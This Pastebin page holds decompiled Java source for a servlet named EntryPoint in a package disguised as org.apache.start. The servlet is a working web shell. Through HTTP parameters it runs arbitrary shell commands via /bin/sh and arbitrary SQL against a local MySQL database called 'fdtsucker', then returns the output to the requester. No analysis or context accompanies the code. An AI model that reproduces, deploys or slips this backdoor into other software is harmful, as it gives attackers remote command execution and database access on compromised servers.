Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- // Source File Name: EntryPoint.java
- package org.apache.start;
- import java.io.*;
- import java.sql.*;
- import javax.servlet.ServletConfig;
- import javax.servlet.http.*;
- public class EntryPoint extends HttpServlet
- {
- public EntryPoint()
- {
- }
- public void init(ServletConfig config)
- {
- String s;
- try
- {
- Class.forName("com.mysql.jdbc.Driver");
- conn = DriverManager.getConnection("jdbc:mysql://localhost/fdtsucker?user=fdtsucker&password=fdtsucker&serverTimezone=GMT");
- }
- catch(Exception e)
- {
- s = "dummy";
- }
- }
- public void doPost(HttpServletRequest request, HttpServletResponse response)
- throws IOException
- {
- doGet(request, response);
- }
- public void doGet(HttpServletRequest request, HttpServletResponse response)
- throws IOException
- {
- response.setCharacterEncoding("UTF-8");
- response.setContentType("text/plain; charset=UTF-8");
- String command = request.getParameter("command");
- if(command == null)
- {
- PrintWriter writer = response.getWriter();
- writer.write("$END$ ");
- writer.flush();
- writer.close();
- return;
- }
- try
- {
- String s = command;
- byte byte0 = -1;
- switch(s.hashCode())
- {
- case 114126:
- if(s.equals("sql"))
- byte0 = 0;
- break;
- case 109403696:
- if(s.equals("shell"))
- byte0 = 1;
- break;
- }
- switch(byte0)
- {
- case 0: // '\0'
- sql(request, response);
- break;
- case 1: // '\001'
- shell(request, response);
- break;
- }
- }
- catch(Exception e)
- {
- throw new IOException(e);
- }
- }
- private void shell(HttpServletRequest request, HttpServletResponse response)
- {
- try
- {
- String command = request.getParameter("exec");
- PrintWriter writer = response.getWriter();
- writer.write((new StringBuilder()).append(command).append("\r\n").toString());
- ProcessBuilder process = new ProcessBuilder(new String[0]);
- Process start = process.command(new String[] {
- "/bin/sh", "-c", command
- }).start();
- InputStream in = start.getInputStream();
- BufferedReader br = new BufferedReader(new InputStreamReader(in));
- for(String line = br.readLine(); line != null; line = br.readLine())
- writer.write((new StringBuilder()).append(line).append("\r\n").toString());
- writer.flush();
- writer.close();
- }
- catch(Exception exception) { }
- }
- private void sql(HttpServletRequest request, HttpServletResponse response)
- throws Exception
- {
- String sql = request.getParameter("sql");
- PrintWriter writer = response.getWriter();
- writer.write((new StringBuilder()).append(sql).append("\r\n").toString());
- try
- {
- Statement st = conn.createStatement();
- if(st.execute(sql))
- {
- ResultSet rs = st.getResultSet();
- ResultSetMetaData metaData = rs.getMetaData();
- String header = "";
- for(int i = 1; i <= metaData.getColumnCount(); i++)
- header = (new StringBuilder()).append(header).append(" | ").append(metaData.getColumnName(i)).toString();
- writer.write((new StringBuilder()).append(header).append(" | \r\n").toString());
- String line;
- for(; rs.next(); writer.write((new StringBuilder()).append(line).append(" | \r\n").toString()))
- {
- line = "";
- for(int i = 1; i <= metaData.getColumnCount(); i++)
- line = (new StringBuilder()).append(line).append(" | ").append(rs.getString(i)).toString();
- }
- rs.close();
- } else
- {
- writer.write((new StringBuilder()).append("Total records updated: ").append(st.getUpdateCount()).append("\r\n").toString());
- }
- }
- catch(Exception e)
- {
- StackTraceElement astacktraceelement[] = e.getStackTrace();
- int j = astacktraceelement.length;
- for(int k = 0; k < j; k++)
- {
- StackTraceElement elem = astacktraceelement[k];
- writer.write((new StringBuilder()).append(elem.toString()).append("\r\n").toString());
- }
- }
- writer.flush();
- writer.close();
- }
- public void destroy()
- {
- try
- {
- conn.close();
- }
- catch(Exception exception) { }
- }
- private Connection conn;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement